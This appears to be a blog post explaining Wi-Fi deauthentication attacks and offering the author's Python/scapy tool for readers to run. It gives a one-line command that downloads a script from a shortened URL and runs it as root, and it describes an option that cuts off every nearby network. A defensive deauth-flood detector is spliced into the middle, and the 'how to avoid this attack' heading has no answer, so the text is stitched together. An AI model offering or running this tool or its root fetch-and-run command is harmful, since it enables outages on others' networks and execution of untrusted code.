A Wi-Fi deauthentication attack is a type of denial-of-service attack that targets communication between a user and a Wi-Fi wireless access point.
As you can see, this type of attack is pretty powerful, and it is difficult to detect who is attacking. There are tools for this attack, such as “aircrack-ng” (you can check the commands here).
So, basically, the attacker broadcasts a Wi-Fi management “de-authentication” frame to the victims, telling them to deauthenticate. It is like saying, “Hey client! Can you please deauthenticate and authenticate again?” The client then reconnects to the AP (access point). These frames are supposed to be sent by a valid AP to its clients, but the attacker can mimic them and broadcast them on the network.
Interestingly, the victim’s laptop/device cannot differentiate between the attacker and the valid AP. The attacker creates the “de-authentication” packet/frame with the valid AP’s MAC address as its source MAC address, so every device thinks the management frame came from the valid AP.
The attacker does not send the frame just once, but sends it continuously. Things get pretty bad: the clients are now continuously trying to reconnect. In this way, the clients never connect to their valid AP until the attacker stops sending the “deauth” frames.
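A defender-side view of the flood described above, as an added example that is not from the original post or the author's repo: it parses raw 802.11 headers (radiotap header already stripped) and flags BSSIDs that receive an abnormal rate of deauth frames. The function names, window, threshold and sample MAC addresses are assumptions constructed for illustration.

```python
import struct
from collections import defaultdict, deque

def _mac(b):
    return ":".join(f"{x:02x}" for x in b)

def parse_deauth(frame):
    """Return (dst, src, bssid, reason) for an 802.11 deauth frame, else None.
    Assumes the radiotap header was already stripped by the capture tool."""
    if len(frame) < 26:              # 24-byte management header + 2-byte reason
        return None
    fc = frame[0]
    version, ftype, subtype = fc & 0x3, (fc >> 2) & 0x3, fc >> 4
    if (version, ftype, subtype) != (0, 0, 12):   # management / deauthentication
        return None
    reason = struct.unpack_from("<H", frame, 24)[0]
    return _mac(frame[4:10]), _mac(frame[10:16]), _mac(frame[16:22]), reason

def detect_floods(captures, window=1.0, threshold=10):
    """captures: iterable of (timestamp_seconds, frame_bytes), time-ordered.
    Returns BSSIDs that saw more than `threshold` deauths within `window` seconds.
    window and threshold are illustrative values, tune them per site."""
    recent, flagged = defaultdict(deque), set()
    for ts, frame in captures:
        parsed = parse_deauth(frame)
        if parsed is None:
            continue
        q = recent[parsed[2]]
        q.append(ts)
        while ts - q[0] > window:    # drop timestamps that left the window
            q.popleft()
        if len(q) > threshold:
            flagged.add(parsed[2])
    return flagged

def _sample(fc0, dst, src, bssid, body):
    # Constructed test frame: frame control, duration, 3 addresses, seq ctl, body
    return bytes([fc0, 0, 0, 0]) + dst + src + bssid + b"\x00\x00" + body

AP1 = bytes.fromhex("aabbcc000001")   # constructed MAC addresses
AP2 = bytes.fromhex("aabbcc000002")
STA = bytes.fromhex("ddeeff000010")
BCAST = b"\xff" * 6
SAMPLE = [(i * 0.01, _sample(0xC0, BCAST, AP1, AP1, b"\x07\x00")) for i in range(50)]
SAMPLE.append((0.2, _sample(0xC0, STA, AP2, AP2, b"\x03\x00")))    # one normal deauth
SAMPLE.append((0.3, _sample(0x80, BCAST, AP2, AP2, b"\x00" * 12)))  # beacon, ignored
SAMPLE.sort(key=lambda c: c[0])

if __name__ == "__main__":
    for bssid in sorted(detect_floods(SAMPLE)):
        print("possible deauth flood against", bssid)
```

Because the source address in these frames is forged, the result identifies the network being targeted, not the sender.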
I automated these steps with Python. I used the “scapy” module to send the “deauth” frames.
You can check my GitHub repo.
Want to try this script? Run the commands below. (Know what you are doing!)
- aircrack-ng (sudo apt-get install aircrack-ng)
- scapy (Python module: sudo apt-get install python-scapy)
Download and run the script
sudo wget -O deauth.py https://goo.gl/5gGHbE && sudo python deauth.py
When you run the command, you should see something like the output below.
When you start the script, it creates the “mon0” interface (a virtual monitoring interface used to send our deauth frames) and observes the Wi-Fi signals. After a few seconds, it displays nearby APs and their MAC addresses. Choose one to broadcast the “deauth” frames to that network, which results in a network outage for the clients connected to that AP.
If you press “0”, the script will send deauth frames to every network (I used multi-threading here :-P).
So, how to avoid this attack?
NOTE: For a deauthentication attack to succeed, you must be near the target network. The deauth packets must reach the connected devices of the target network(s).
Just check my repo; you can also run the script in some other ways. Dependency problems on your machine? Use my Docker image to set up the environment quickly.